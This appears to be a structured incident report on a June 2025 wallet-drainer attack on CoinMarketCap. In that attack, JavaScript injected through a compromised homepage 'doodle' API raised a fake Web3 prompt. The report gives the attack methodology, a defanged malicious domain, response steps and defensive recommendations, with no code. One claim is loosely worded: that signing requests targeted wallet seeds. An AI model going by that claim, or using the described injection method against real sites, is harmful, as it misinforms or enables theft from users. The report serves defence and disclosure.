Full Report
A cyber-attack on CoinMarketCap exposed users to a fake Web3 wallet prompt, draining $43,266 from wallets
Analysis Summary
# Incident Report: CoinMarketCap Web3 Wallet Drainer Attack
## Executive Summary
On June 20, 2025, CoinMarketCap experienced a security incident where malicious JavaScript was injected via a compromised homepage "doodle" image, leading to a fake Web3 wallet prompt. This prompt successfully drained approximately $43,000 in cryptocurrency assets from connected user wallets before the threat was discovered and contained on the same evening.
## Incident Details
- **Discovery Date:** Friday evening, June 20, 2025
- **Incident Date:** On or around June 20, 2025
- **Affected Organization:** CoinMarketCap
- **Sector:** Cryptocurrency Data Tracking / DeFi Adjacent
- **Geography:** Global (as CoinMarketCap is a worldwide service)
## Timeline of Events
### Initial Access
- **Date/Time:** Prior to June 20, 2025 (Injected payload)
- **Vector:** Compromised third-party API call related to a homepage "doodle" image feature.
- **Details:** Attackers modified a JSON payload accessed via an API, causing it to load malicious JavaScript from an external source: `static.cdnkit[.]io`.
### Lateral Movement
* Not explicitly detailed; the attack focused on immediate client-side exploitation upon page load/interaction rather than deep network compromise.
### Data Exfiltration/Impact
- **Details:** The malicious script displayed a fake Web3 connection prompt. Once users connected or approved transactions via this prompt, the script executed code that drained assets from their connected cryptocurrency wallets.
- **Loss:** Approximately $43,000 stolen across affected user accounts.
### Detection & Response
- **How it was discovered:** The breach was discovered on Friday evening, June 20, 2025.
- **Response actions taken:** CoinMarketCap immediately removed the problematic content (the compromised doodle/API link), identified the root cause (modified JSON payload), and implemented measures to isolate and mitigate the issue.
## Attack Methodology
- **Initial Access:** Injection of malicious JavaScript via a compromised API linked to a homepage element ("doodle" image).
- **Persistence:** Not applicable; exploit was designed for immediate execution upon page load/user interaction.
- **Privilege Escalation:** Not applicable; reliance on user trust for wallet interaction.
- **Defense Evasion:** Using a legitimate-looking third-party script host (`static.cdnkit[.]io`) to load the malicious payload, potentially bypassing simple content filters on the primary domain.
- **Credential Access:** Directly targeted Web3 wallet seeds/keys through fraudulent signing requests presented in the fake prompt.
- **Discovery:** Not applicable (Attacker discovery or system monitoring).
- **Lateral Movement:** Not applicable.
- **Collection:** Wallet balances and connection details were targeted.
- **Exfiltration:** Cryptocurrency assets were directly transferred out of user wallets to attacker-controlled addresses.
- **Impact:** Financial loss for users who interacted with the prompt.
## Impact Assessment
- **Financial:** Approximately $43,000 stolen from user accounts.
- **Data Breach:** Compromise of user wallet access/funds, though personal identifying information (PII) might not have been the primary target if the attack relied solely on wallet interaction.
- **Operational:** Brief period of exposure; systems were fully operational shortly after mitigation.
- **Reputational:** Negative publicity for CoinMarketCap regarding security practices surrounding third-party integrations.
## Indicators of Compromise
- **Network indicators (Defanged):** Traffic to `static[.]cdnkit[.]io` during the incident window.
- **File indicators:** Malicious JavaScript injected into the application flow.
- **Behavioral indicators:** Display of an unexpected, official-looking Web3 connection prompt on the CoinMarketCap homepage outside of intended functionality.
## Response Actions
- **Containment measures:** Immediate removal of the problematic content (the compromised doodle/API reference).
- **Eradication steps:** Identified and shut down the mechanism allowing the malicious payload injection (the compromised third-party API link/JSON payload).
- **Recovery actions:** Verified that all systems were fully operational and secure afterward.
## Lessons Learned
- The reliance on external/third-party API calls for core visual elements (like a "doodle") introduces significant supply chain risk if validation is insufficient.
- Wallet drainer attacks remain a critical threat in the Web3 space, relying heavily on user complacency surrounding connection prompts.
## Recommendations
- Implement stricter Content Security Policies (CSP) to limit external script loading, especially for dynamic elements.
- Increase real-time monitoring and anomaly detection for changes originating from high-visibility components like homepage assets.
- Enhance user education regarding wallet security, emphasizing that legitimate services rarely request broad permissions via unexpected pop-ups, especially outside of dedicated wallet software interfaces.
- Review and audit all vendor/API integrations feeding dynamic content to the main website.